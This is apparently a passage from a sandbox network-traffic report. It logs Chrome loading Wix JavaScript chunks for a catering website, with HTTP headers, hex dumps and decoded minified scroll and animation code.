                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC1390INData Raw: 2e 76 61 6c 75 65 7d 24 7b 63 2e 74 79 70 65 7d 60 7d 29 29 2c 6f 5b 74 5d 7d 3b 72 65 74 75 72 6e 7b 69 6e 69 74 3a 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 61 2e 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 53 49 54 45 5f 43 4f 4e 54 41 49 4e 45 52 22 29 2c 72 3d 61 2e 69 6e 6e 65 72 48 65 69 67 68 74 3b 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 74 29 2e 66 6f 72 45 61 63 68 28 28 28 5b 74 2c 6f 5d 29 3d 3e 7b 63 6f 6e 73 74 20 73 3d 28 29 3d 3e 7b 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 60 23 24 7b 74 7d 2c 20 24 7b 28 30 2c 6d 2e 70 56 29 28 74 29 7d 60 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 69 66 28 65 29 7b 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 3e 72 26 26 28 6f 2e 74 68 72 65 73 68 6f 6c 64
                                                                                                                                                                                                                        Data Ascii: .value}${c.type}`})),o[t]};return{init:()=>{const e=a.document.getElementById("SITE_CONTAINER"),r=a.innerHeight;Object.entries(t).forEach((([t,o])=>{const s=()=>{e.querySelectorAll(`#${t}, ${(0,m.pV)(t)}`).forEach((e=>{if(e){e.offsetHeight>r&&(o.threshold
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC1390INData Raw: 63 74 69 6f 6e 57 69 74 68 42 70 52 61 6e 67 65 73 3a 65 2c 73 63 72 75 62 42 70 52 61 6e 67 65 73 3a 74 7d 2c 72 2c 61 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 5b 5d 3b 6c 65 74 20 6f 3d 21 31 3b 63 6f 6e 73 74 20 73 3d 74 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 72 2e 69 6e 6e 65 72 57 69 64 74 68 3b 61 2e 73 63 72 75 62 28 63 28 6e 2c 65 29 2c 74 29 7d 2c 69 3d 65 3d 3e 7b 65 2e 6d 61 74 63 68 65 73 26 26 73 28 21 30 29 7d 2c 63 3d 28 65 2c 74 29 3d 3e 74 2e 72 65 64 75 63 65 28 28 28 74 2c 72 29 3d 3e 7b 69 66 28 21 28 6f 7c 7c 22 70 6f 69 6e 74 65 72 2d 6d 6f 76 65 22 21 3d 3d 72 2e 74 72 69 67 67 65 72 44 61 74 61 2e 74 72 69 67 67 65 72 29 29 72 65 74 75 72 6e 20 74 3b 72 65 74 75 72 6e 20 75 28 72 2e 74 72 69 67 67 65 72 42 70 52 61 6e 67 65 2c 65 29 26 26 72
                                                                                                                                                                                                                        Data Ascii: ctionWithBpRanges:e,scrubBpRanges:t},r,a)=>{const n=[];let o=!1;const s=t=>{const n=r.innerWidth;a.scrub(c(n,e),t)},i=e=>{e.matches&&s(!0)},c=(e,t)=>t.reduce(((t,r)=>{if(!(o||"pointer-move"!==r.triggerData.trigger))return t;return u(r.triggerBpRange,e)&&r
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC758INData Raw: 61 67 65 49 64 3a 65 2c 65 6c 65 6d 65 6e 74 3a 61 7d 29 7d 29 29 7d 29 29 7d 29 29 7d 2c 73 3d 6e 65 77 20 4d 75 74 61 74 69 6f 6e 4f 62 73 65 72 76 65 72 28 28 65 3d 3e 7b 65 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 69 66 28 65 2e 61 64 64 65 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 29 7b 63 6f 6e 73 74 20 74 3d 6e 2e 67 65 74 28 65 2e 74 61 72 67 65 74 29 3b 6f 3f 2e 28 74 2c 65 2e 61 64 64 65 64 4e 6f 64 65 73 29 7d 7d 29 29 7d 29 29 3b 72 65 74 75 72 6e 7b 6f 62 73 65 72 76 65 3a 28 65 2c 74 2c 72 29 3d 3e 7b 61 5b 65 5d 26 26 28 6e 2e 73 65 74 28 74 2c 65 29 2c 73 2e 6f 62 73 65 72 76 65 28 74 2c 7b 63 68 69 6c 64 4c 69 73 74 3a 21 30 7d 29 2c 72 26 26 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 28 28 29 3d 3e 6f 28 65 2c 74 2e
                                                                                                                                                                                                                        Data Ascii: ageId:e,element:a})}))}))}))},s=new MutationObserver((e=>{e.forEach((e=>{if(e.addedNodes.length){const t=n.get(e.target);o?.(t,e.addedNodes)}}))}));return{observe:(e,t,r)=>{a[e]&&(n.set(t,e),s.observe(t,{childList:!0}),r&&requestAnimationFrame((()=>o(e,t.


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        126192.168.2.55008134.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC639OUTGET /services/wix-thunderbolt/dist/triggersAndReactions.e7bf7036.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1162INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 1352
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: FfeZvj1AIc0SvIrpCBbmksAiJwB7I87v
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 426708856 397552378
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 971887568
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:54:00 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 273553
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:49:01 GMT
                                                                                                                                                                                                                        ETag: "a032340b7d80e2f00882b993c262b01f"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC228INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 39 33 5d 2c 7b 33 36 36 35 35 3a 28 74 2c 6f 2c 72 29 3d 3e 7b 72 2e 64 28 6f 2c 7b 66 3a 28 29 3d 3e 69 7d 29 3b 76 61 72 20 6e 3d 72 28 31 37 37 30 39 29 2c 65 3d 72 2e 6e 28 6e 29 3b 63 6f 6e 73 74 20 73 3d 28 74 2c 6f 29 3d 3e 6f 3f 74 2e 73 63 72 6f 6c 6c 4c 65 66 74 3a 74 2e 73 63 72 6f 6c 6c 54 6f 70 2c 6c 3d 28 74 2c 6f 2c 72 29 3d 3e 7b 63 6f 6e 73 74 20 6e
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[693],{36655:(t,o,r)=>{r.d(o,{f:()=>i});var n=r(17709),e=r.n(n);const s=(t,o)=>o?t.scrollLeft:t.scrollTop,l=(t,o,r)=>{const n
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1124INData Raw: 3d 73 28 74 2c 72 29 2c 65 3d 28 28 74 2c 6f 29 3d 3e 6f 3f 74 2e 73 63 72 6f 6c 6c 57 69 64 74 68 3a 74 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 29 28 74 2c 72 29 2c 6c 3d 28 28 74 2c 6f 29 3d 3e 7b 63 6f 6e 73 74 20 72 3d 74 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 3b 72 65 74 75 72 6e 20 6f 3f 72 2e 77 69 64 74 68 3a 72 2e 68 65 69 67 68 74 7d 29 28 74 2c 72 29 2c 69 3d 22 66 6f 72 77 61 72 64 22 3d 3d 3d 6f 3f 31 3a 2d 31 2c 7b 6d 69 6e 53 63 72 6f 6c 6c 50 6f 73 69 74 69 6f 6e 3a 63 2c 6d 61 78 53 63 72 6f 6c 6c 50 6f 73 69 74 69 6f 6e 3a 61 7d 3d 28 28 74 2c 6f 2c 72 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 72 3f 22 6c 65 66 74 22 3a 22 74 6f 70 22 2c 65 3d 73 28 74 2c 72 29 3b 74 2e 73 63 72 6f 6c 6c 54 6f 28 7b 5b 6e 5d 3a
                                                                                                                                                                                                                        Data Ascii: =s(t,r),e=((t,o)=>o?t.scrollWidth:t.scrollHeight)(t,r),l=((t,o)=>{const r=t.getBoundingClientRect();return o?r.width:r.height})(t,r),i="forward"===o?1:-1,{minScrollPosition:c,maxScrollPosition:a}=((t,o,r)=>{const n=r?"left":"top",e=s(t,r);t.scrollTo({[n]:


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        127192.168.2.55008334.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC631OUTGET /services/wix-thunderbolt/dist/windowScroll.60e92730.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1162INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 2631
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: S.a_onOdAWUk5WynOCrdjzhAktDn5dyt
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 972403056 963911199
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 273539163
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc5jtBSNVBClNnNc015G4PmlZXoVxLpWMsBL92iJ2slGH
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:54:00 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 273553
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:49:01 GMT
                                                                                                                                                                                                                        ETag: "57f88f8b36a1258e0ba372b861809678"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC228INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 31 36 2c 33 36 30 35 5d 2c 7b 38 31 32 32 30 3a 28 75 2c 63 2c 74 29 3d 3e 7b 74 2e 64 28 63 2c 7b 51 66 3a 28 29 3d 3e 6e 2c 53 37 3a 28 29 3d 3e 72 2c 54 5f 3a 28 29 3d 3e 69 2c 74 6e 3a 28 29 3d 3e 62 2c 78 67 3a 28 29 3d 3e 65 7d 29 3b 63 6f 6e 73 74 20 65 3d 75 3d 3e 2d 28 4d 61 74 68 2e 63 6f 73 28 4d 61 74 68 2e 50 49 2a 75 29 2d 31 29 2f 32 2c 69 3d 75 3d 3e
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[316,3605],{81220:(u,c,t)=>{t.d(c,{Qf:()=>n,S7:()=>r,T_:()=>i,tn:()=>b,xg:()=>e});const e=u=>-(Math.cos(Math.PI*u)-1)/2,i=u=>
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1390INData Raw: 75 3c 2e 35 3f 32 2a 75 2a 2a 32 3a 31 2d 28 2d 32 2a 75 2b 32 29 2a 2a 32 2f 32 2c 62 3d 75 3d 3e 75 3c 2e 35 3f 28 31 2d 4d 61 74 68 2e 73 71 72 74 28 31 2d 34 2a 75 2a 2a 32 29 29 2f 32 3a 28 4d 61 74 68 2e 73 71 72 74 28 2d 28 32 2a 75 2d 33 29 2a 28 32 2a 75 2d 31 29 29 2b 31 29 2f 32 2c 6e 3d 7b 6c 69 6e 65 61 72 3a 75 3d 3e 75 2c 73 69 6e 65 49 6e 3a 75 3d 3e 31 2d 4d 61 74 68 2e 63 6f 73 28 75 2a 4d 61 74 68 2e 50 49 2f 32 29 2c 73 69 6e 65 4f 75 74 3a 75 3d 3e 4d 61 74 68 2e 73 69 6e 28 75 2a 4d 61 74 68 2e 50 49 2f 32 29 2c 73 69 6e 65 49 6e 4f 75 74 3a 65 2c 71 75 61 64 49 6e 3a 75 3d 3e 75 2a 2a 32 2c 71 75 61 64 4f 75 74 3a 75 3d 3e 31 2d 28 31 2d 75 29 2a 2a 32 2c 71 75 61 64 49 6e 4f 75 74 3a 69 2c 63 75 62 69 63 49 6e 3a 75 3d 3e 75 2a 2a
                                                                                                                                                                                                                        Data Ascii: u<.5?2*u**2:1-(-2*u+2)**2/2,b=u=>u<.5?(1-Math.sqrt(1-4*u**2))/2:(Math.sqrt(-(2*u-3)*(2*u-1))+1)/2,n={linear:u=>u,sineIn:u=>1-Math.cos(u*Math.PI/2),sineOut:u=>Math.sin(u*Math.PI/2),sineInOut:e,quadIn:u=>u**2,quadOut:u=>1-(1-u)**2,quadInOut:i,cubicIn:u=>u**
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1013INData Raw: 35 2c 20 30 2e 32 32 29 22 2c 71 75 61 72 74 4f 75 74 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 36 35 2c 20 30 2e 38 34 2c 20 30 2e 34 34 2c 20 31 29 22 2c 71 75 61 72 74 49 6e 4f 75 74 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 37 37 2c 20 30 2c 20 30 2e 31 37 35 2c 20 31 29 22 2c 71 75 69 6e 74 49 6e 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 37 35 35 2c 20 30 2e 30 35 2c 20 30 2e 38 35 35 2c 20 30 2e 30 36 29 22 2c 71 75 69 6e 74 4f 75 74 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 32 33 2c 20 31 2c 20 30 2e 33 32 2c 20 31 29 22 2c 71 75 69 6e 74 49 6e 4f 75 74 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 38 36 2c 20 30 2c 20 30 2e 30 37 2c 20 31 29 22 2c 65 78 70 6f 49 6e 3a 22 63 75 62 69 63 2d 62 65 7a 69 65
                                                                                                                                                                                                                        Data Ascii: 5, 0.22)",quartOut:"cubic-bezier(0.165, 0.84, 0.44, 1)",quartInOut:"cubic-bezier(0.77, 0, 0.175, 1)",quintIn:"cubic-bezier(0.755, 0.05, 0.855, 0.06)",quintOut:"cubic-bezier(0.23, 1, 0.32, 1)",quintInOut:"cubic-bezier(0.86, 0, 0.07, 1)",expoIn:"cubic-bezie


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        128192.168.2.55008234.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:12 UTC627OUTGET /services/wix-thunderbolt/dist/group_11.ffa65b2d.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1162INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 1217
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: _aNNA78h67gJslsnqdgAOTL8G__jl7rs
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 383512147 402394836
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 977406751
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Tue, 07 Jan 2025 09:54:00 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 273553
                                                                                                                                                                                                                        Last-Modified: Tue, 07 Jan 2025 09:48:57 GMT
                                                                                                                                                                                                                        ETag: "15bae755a94c8e4fedc748581ee318de"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC228INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 4a 73 6f 6e 70 5f 5f 77 69 78 5f 74 68 75 6e 64 65 72 62 6f 6c 74 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 31 37 37 5d 2c 7b 32 34 33 30 39 3a 28 61 2c 65 2c 6e 29 3d 3e 7b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 70 61 67 65 3a 28 29 3d 3e 6d 7d 29 3b 76 61 72 20 73 3d 6e 28 31 36 35 33 37 29 2c 74 3d 6e 28 37 37 37 34 38 29 2c 6c 3d 6e 28 38 37 37 31 31 29 2c 6f 3d 6e 28 32 30 35 39 30 29 2c 67 3d 6e 28 33 39 32 31 38 29 2c 69 3d 6e 28 31 30 35 35 33 29 2c 75 3d 6e 28
                                                                                                                                                                                                                        Data Ascii: "use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[2177],{24309:(a,e,n)=>{n.r(e),n.d(e,{page:()=>m});var s=n(16537),t=n(77748),l=n(87711),o=n(20590),g=n(39218),i=n(10553),u=n(
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC989INData Raw: 37 33 31 35 37 29 2c 70 3d 6e 28 34 35 31 31 37 29 3b 63 6f 6e 73 74 20 72 3d 22 6c 61 6e 64 69 6e 67 50 61 67 65 22 2c 63 3d 28 30 2c 74 2e 4f 67 29 28 5b 6c 2e 4a 69 5d 2c 28 61 3d 3e 7b 63 6f 6e 73 74 20 65 3d 28 29 3d 3e 28 61 2e 67 65 74 28 22 6d 61 73 74 65 72 50 61 67 65 22 29 7c 7c 7b 7d 29 2e 63 6c 61 73 73 4e 61 6d 65 73 7c 7c 7b 7d 2c 6e 3d 65 3d 3e 7b 61 2e 75 70 64 61 74 65 28 7b 6d 61 73 74 65 72 50 61 67 65 3a 7b 63 6c 61 73 73 4e 61 6d 65 73 3a 65 7d 7d 29 7d 2c 73 3d 61 3d 3e 7b 63 6f 6e 73 74 20 65 3d 7b 2e 2e 2e 61 7d 3b 72 65 74 75 72 6e 20 64 65 6c 65 74 65 20 65 5b 72 5d 2c 65 7d 3b 72 65 74 75 72 6e 7b 61 73 79 6e 63 20 75 70 64 61 74 65 43 6c 61 73 73 4e 61 6d 65 73 4f 6e 50 61 67 65 57 69 6c 6c 4d 6f 75 6e 74 28 61 29 7b 63 6f 6e
                                                                                                                                                                                                                        Data Ascii: 73157),p=n(45117);const r="landingPage",c=(0,t.Og)([l.Ji],(a=>{const e=()=>(a.get("masterPage")||{}).classNames||{},n=e=>{a.update({masterPage:{classNames:e}})},s=a=>{const e={...a};return delete e[r],e};return{async updateClassNamesOnPageWillMount(a){con


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        129192.168.2.55008634.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC406OUTGET /services/wix-thunderbolt/dist/group_24.8fa71ce8.chunk.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:13 UTC1161INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 2551
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: eDoEirkSQS4c5Rpfyq2bq0F.rJde37te
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 998525429 907234298
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 106829047
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 06:45:17 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 25676
